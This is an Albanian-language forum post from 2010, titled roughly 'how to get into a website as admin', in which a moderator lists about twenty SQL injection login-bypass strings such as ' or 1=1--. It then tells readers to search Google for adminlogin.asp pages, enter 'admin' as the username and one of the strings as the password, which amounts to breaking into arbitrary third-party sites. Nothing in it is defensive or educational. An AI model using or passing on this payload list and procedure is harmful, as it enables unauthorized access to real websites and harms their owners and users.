Kliko për të hyrë
Kliko për tu regjistruar nëse nuk e keni bërë deri tani!

www.KosovaPc.Tk · [ Postimet e Reja · Antarët · Rregullat dhe Ndihma! · Kërko · RSS ]
 
Prezantimi
Tema Shoqërore
Romanca
Lajme
Receta Gatimi
Psikologjia
Shëndeti
Informatika
Sport
Argëtim & Zbavitje
...Ndihma!
  • Page 1 of 1
  • 1
Forumi Kosova Pc » Shkenca dhe Teknologjia » Informatika » si te hym ne wep si admin
si te hym ne wep si admin
KujtiDate: E Hënë, 06.December.2010, 9:24 PM | Message # 1
Toger
Group: Moderators
Messages: 68
Awards: 0
Reputation: 0
Status: Offline
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a Duhesh mi
provu keiit veq shkon ne google e shenon adminlogin.asp
edhe e merr ni wep qatu
username---- e shenon admin
password----e shenon njanin prej qitynve stringsave nalt po mos harroni edhe passi munet me kan admin?
 
Forumi Kosova Pc » Shkenca dhe Teknologjia » Informatika » si te hym ne wep si admin
  • Page 1 of 1
  • 1
Search: